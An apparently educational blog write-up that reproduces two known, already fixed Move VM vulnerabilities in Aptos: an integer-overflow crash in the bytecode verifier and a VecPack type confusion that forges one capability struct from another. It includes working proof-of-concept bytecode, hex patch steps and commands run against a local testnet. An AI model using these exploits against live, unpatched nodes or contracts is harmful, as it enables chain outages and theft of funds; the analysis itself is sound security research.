Reproduce two critical bugs in Move VM and know why

#1: The Crash Bug

A bug in the move virtual machine can cause crash in aptos applications.

Introduction

https://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e

The Move programming language is used in many well-known projects, like Aptos and Sui.

Move virtual machine (movevm) like Ethereum Virtual Machine evm are the same, where it needs to compile the source code into byte code and exectued in the virtual machine.

  • the bytecode is loaded in through the function execute_script
  • Execute load_script function, this function is mainly used to deserialize the bytecode, and verify whether the bytecode is legal, if the verification fails, it will return as a failure
  • After successful verification, the real bytecode code is then executed
  • Execute the bytecode, access or modify the state of global storage, including resources, modules

Verification Module

before the real execution of bytecode code, verification of bytecode is performed. The verification can be subdivided into a number of sub-processes respectively.

  • *BoundsChecker*, is mainly used to check the boundary security of the module and script. This includes checking the boundary of signature, constants, etc.
  • *DuplicationChecker*, a module that implements a checker to verify whether each vector in a CompiledModule contains different values
  • *SignatureChecker*, which checks that the field structure is correct when the signature is used for function parameters, local variables, and structure members
  • *InstructionConsistency*, which verifies instruction consistency
  • *Constants* are used to verify that constants are of the original type and that the data of constants are correctly serialized to their type
  • *CodeUnitVerifier*, to verify the correctness of the function body code, via stack_usage_verifier.rs and abstract_interpreter.rs respectively
  • *script_signature*, to verify that a script or entry function is a valid signature

CodeUnitVerifier

The vulnerability existed in the logic of checking stack size check when verifying blocks of code.

Specifically, stack_size_increment can be indirectly controlled by constructing an oversized num_pushes, resulting in an integer overflow vulnerability.

Reproduction

install aptos-cli tool:

1
$ curl -fsSL "https://aptos.dev/scripts/install_cli.py" | python3

run aptos node

1
2
3
$ git clone git@github.com:aptos-labs/aptos-core.git ~/aptos-core && cd ~/aptos-core

$ cargo run -p aptos -- node run-local-testnet --with-faucet --faucet-port 8081 --force-restart --assume-yes

poc bytecode file

Disassemble the bytecode. We can see the code at line 1 and line 2 are two VecUnpack instructions.

The function of VecUnpack is to push all the data to the stack when the vector object is encountered in the code. That said the instruction will unpack a statically known number of elements onto the stack.

Thus, two lines of code will let VM add 3315214543476364830 and 18394158839224997406 via stack_size_increment += num_pushes;, which is greater than the maximum value of u64 (18446744073709551615). This cause add overflow panic featured by Rust and let the Aptos node crash down.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
$ move new Test
$ cp 1.mv Test/
$ cd Test
$ move sandbox view 1.mv

// Move bytecode v4
script {

main<Ty0: drop, Ty1: drop>(Arg0: u8) {
B0:
0: LdU64(3323940208748926750)
1: VecUnpack(2, 3315214543476364830)
2: VecUnpack(2, 18394158839224997406)
3: Ret
B1:
4: Ret
B2:
5: Ret
B3:
6: Ret
B4:
7: Ret
B5:
8: Ret
B6:
9: Ret
B7:
10: Ret
B8:
11: Ret
B9:
12: Ret
B10:
13: Ret
B11:
14: Ret
B12:
15: Ret
B13:
16: Ret
B14:
17: Ge
18: Ret
B15:
19: Or
20: Sub
21: Or
22: VecPopBack(2)
23: Ret
B16:
24: FreezeRef
25: VecUnpack(2, 163587547629229598)
26: Ret
B17:
27: Ret
B18:
28: Ret
B19:
29: Ret
B20:
30: Ret
B21:
31: Or
32: Or
33: Sub
34: Ret
B22:
35: FreezeRef
36: VecPopBack(2)
37: Ret
}
}

Crash the node:

1
$ aptos move run-script --compiled-script-path 1.mv

The node backend logs show:

#2: The Loss of Found Bug / Type Confusion Bug

A bug in the move virtual machine can cause loss of found in aptos applications due to type confusion problem.

Introduction

Lets first see the README document in the move repo for bytecode verifier. https://github.com/move-language/move/tree/96d7dd69c5fe2e1aa2c36831c8d0154c3e3acfe0/language/move-bytecode-verifier

So here the bug is happened at the type safety checking stage.

Type Safety

The second phase of the analysis checks that each operation, primitive or defined function, is invoked with arguments of appropriate types. The operands of an operation are values located either in a local variable or on the stack. The types of local variables of a function are already provided in the bytecode. However, the types of stack values are inferred. This inference and the type checking of each operation can be done separately for each block. Since the stack height at the beginning of each block is n and does not go below n during the execution of the block, we only need to model the suffix of the stack starting at n for type checking the block instructions. We model this suffix using a stack of types on which types are pushed and popped as the instruction stream in a block is processed. Only the type stack and the statically-known types of local variables are needed to type check each instruction.

We can see the fix commit is to add additional check in VecPack operator. As seen below, previous code didn’t check the consistency of operand types in a vector while after code checks.

We see how VecPack specifically works in Move VM.

aptos move init --name test_move

1
2
3
4
5
6
7
module test::test_move{
use std::vector;
public fun test() {
let v = vector::empty<u64>();
vector::push_back(&mut v, 5);
}
}

move disassemble --name test_move

1
2
3
4
5
6
7
8
9
10
11
12
13
14
module cafe.test_move {


public test() {
L0: v: vector<u64>
B0:
0: VecPack(2, 0)
1: StLoc[0](v: vector<u64>)
2: MutBorrowLoc[0](v: vector<u64>)
3: LdU64(5)
4: VecPushBack(2)
5: Ret
}
}

The first instruction is VecPack. This operator is to initialize a vector. The first parameter represents a type index, which will be parsed into a specific type when compiling. In this example, u64 is the type for this vector. The second parametere represents the number of elements when initializing. Here because we use vector::empty<u64>(), we do not hv element to initialize the vector and the parameter is 0. For example, if we use vector<u64>[0,1,2]; , the second parameter will be 3.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// Move bytecode v5
module cafe.test_move {


public test() {
L0: a: u8
L1: num: u8
L2: v: vector<u8>
B0:
0: VecPack(2, 0)
1: StLoc[2](v: vector<u8>)
2: MutBorrowLoc[2](v: vector<u8>)
3: LdU8(1)
4: VecPushBack(2)
5: MutBorrowLoc[2](v: vector<u8>)
6: VecPopBack(2)
7: StLoc[0](a: u8)
8: ImmBorrowLoc[0](a: u8)
9: Call[0](print<u8>(&u8))
10: Ret
}
}

That’s introduction of VecPack. Then lets reproduce this vulnerability in an example.

Reproduction

First, clone the aptos project:

1
git clone https://github.com/aptos-labs/aptos-core.git

Switch to a old commit version.

1
2
git checkout 649fb13e021f8e6a4d28c3410767a9af6106dbb1
git switch -c fixed

The code in this commit already fixed the bug. So we need to replace the move version in code here.

1
2
3
4
5
6
Replace any "77750b37bb3663d00a7c4058937fed42ceb3089e" to "59265662d0a44ba53b09ba3c4b2248efdf08c622" in the repo.

Replace any "github.com/aptos-labs/move" to "github.com/move-language/move" in the repo.

git add *
git commit -m "replace vulnerable move commit 59265662d0a44ba53b09ba3c4b2248efdf08c622"

First, open a tmux session and setup a local test aptos environment by following command:

1
cargo run --release -p aptos -- node run-local-testnet --with-faucet --faucet-port 8081 --force-restart --assume-yes

This command will also build a aptos-cli tool at aptos-core/target/release/aptos for us to interact with the validator node.

We can copy this tool to our shell path cp target/release/aptos ~/bin

Open another tmux session and publish module to the aptos network.

1
2
aptos init
aptos account fund-with-faucet --account default --amount 100000000

Now we published a coin called TestCoin to the local aptos network.

TestCoin code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
module TestCoin::test_coin {

use aptos_framework::coin;
use std::debug;
use std::signer;

struct TestCoin {}

struct OneCap has drop {}

struct TwoCap has drop {}

fun init_module(sender: &signer) {
aptos_framework::managed_coin::initialize<TestCoin>(
sender,
b"Test Coin",
b"Test",
6,
false,
);
}

public entry fun balance_of(owner: address) {
let balance = coin::balance<TestCoin>(owner);
debug::print(&balance);
}

public fun get_one_cap(): OneCap {
return OneCap{}
}

public fun get_two_cap(): TwoCap {
return TwoCap{}
}

public fun test(one_cap: OneCap)
{
debug::print(&b"hello");
}
}

We mainly focus on two structs defined here. one is called OneCap, another is called TwoCap.

We have also a function called test, which will print a “hello” being invoked when the parameter is OneCap .

1
aptos move publish --named-addresses TestCoin=default

As the fix commit shows, we can use VecPack to pack a element of a type into anther targeted type of vector, which later unpacking this vector will give us the targeted type.

Our original script looks like this:

1
2
3
4
5
6
7
8
9
10
script {
use std::vector;

fun poc(account: &signer) {
let onecap = TestCoin::test_coin::get_one_cap();
let twocap = TestCoin::test_coin::get_two_cap();
let v = vector[twocap];
TestCoin::test_coin::test(onecap);
}
}

This is a valid script, we get a OneCap instance and call test with this onecap.

This the details of the above bytecode (move provide a document to eplain their bytecode format https://github.com/move-language/move/blob/main/language/documentation/spec/vm.md)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
MAGIC
a11c eb0b

VERSION
0500 0000

TABLE_COUNT
06

MODULE_HANDLES
01 00 02 -> 00 00

STRUCT_HANDLES
02 02 08 -> 00 01 02 00
00 02 02 00

FUNCTION_HANDLES
03 0A 0F -> 00 03 02 03 00 -> get_one_cap()
00 04 02 04 00 -> get_two_cap()
00 05 03 02 00 -> test(cap)

SIGNATURES
05 19 12 -> 01 06 0c -> signer
03 08 00 08 01 0A 08 01 ->
00
01 08 00 -> OneCap
01 08 01 -> TwoCap

IDENTIFIERS
07 2B 35 -> 09 6d 6f 6f 6e 5f 63 6f 69 6e moon_coin
06 4f 6e 65 43 61 70 OneCap
06 54 77 6F 43 61 70 TwoCap
0b 67 65 74 5f 6f 6e 65 5f 63 61 70 get_one_cap
0b 67 65 74 5f 74 77 6f 5f 63 61 70 get_two_cap
04 74 65 73 74 test

ADDRESS_IDENTIFIERS
08 60 20 -> 7fde 7f3f aac1 6e02 1829 c3b9 0f2f 65cd d13d 209b 55e5 2ded 1944 31c0 a4ec 6e63

Code Head
0000 010a

Code Content
1100 CALL(index->FUNCTION_HANDLES)
0c01 ST_LOC(index->register)
1101 CALL(index->FUNCTION_HANDLES)
0c02 ST_LOC(index->register)
0b02 MOVE_LOC(index->register)
4004 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
01 POP
0b01 MOVE_LOC(index->register)
1102 CALL(index->FUNCTION_HANDLES)
02 RET

Let’s directly run this script first.

1
aptos move run-script --compiled-script-path build/TestCoin/bytecode_scripts/poc.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

The test function will be invoked normally.

Now, let’s try to directly call the test function using TwoCap instance.

We can do this by modifying the code section in bytecode like below.

1
2
3
4
5
6
7
8
9
10
Code Content
1100 CALL(index->FUNCTION_HANDLES)
0c01 ST_LOC(index->register)
1101 CALL(index->FUNCTION_HANDLES)
0c02 ST_LOC(index->register)
0b02 MOVE_LOC(index->register)
4004 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
4604 01000000 00000000 VEC_UNPACK(index->SIGNATURES, length)
1102 CALL(index->FUNCTION_HANDLES)
02 RET

(Don’t forget also changing the number of instructions in code hearder)

After modification, we get the bytecode:

1
aptos move run-script --compiled-script-path test_poc.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

No surprises, we get an error:

1
2
3
{
"Error": "Simulation failed with status: Transaction Executed and Committed with Error CALL_TYPE_MISMATCH_ERROR"
}

Because the element in the vector is TwoCap type and we unpack this twocap on the stack, taking it as parameter to call test.

But as we mentioned before, the VecPack actually miss a check when packing the elements. We can actually change the type index in the Vecpack instruction and also VecUnpack. Then we cange forge a OneCap using a TwoCap and vector operaion.

1
aptos move run-script --compiled-script-path test_poc1.mv  --framework-local-dir ~/move-language/aptos-core/aptos-move/framework/aptos-framework

We successfully call the test() function.

Actually, we understand the bug now and we can simplify the code.

  1. call the get_two_cap(), the return value will be pushed on the stack.
  2. vecpack the value on the stack, using OneCap index
  3. unpack the value back on the stack, the value become OneCap
  4. call the test() using the value on stack
  5. ret
1
2
3
4
5
1101 CALL(index->FUNCTION_HANDLES)
4003 01000000 00000000 VEC_PACK(index->SIGNATURES, length)
4603 01000000 00000000 VEC_UNPACK(index->SIGNATURES, length)
1102 CALL(index->FUNCTION_HANDLES)
02 RET

Our poc works.

Moreover, it seems only we can do this via struct. I furthur test changing u64 tou128 and it failed. Internal implementation will raise an error INTERNAL_TYPE_ERROR for casting u64 to u128.

This example can happen in real-world application when OneCap is some capability type that should be restricted like MintCapability and TwoCap are not like ViewBalanceCapability.

Then it will easily cause loss of found or other severe results.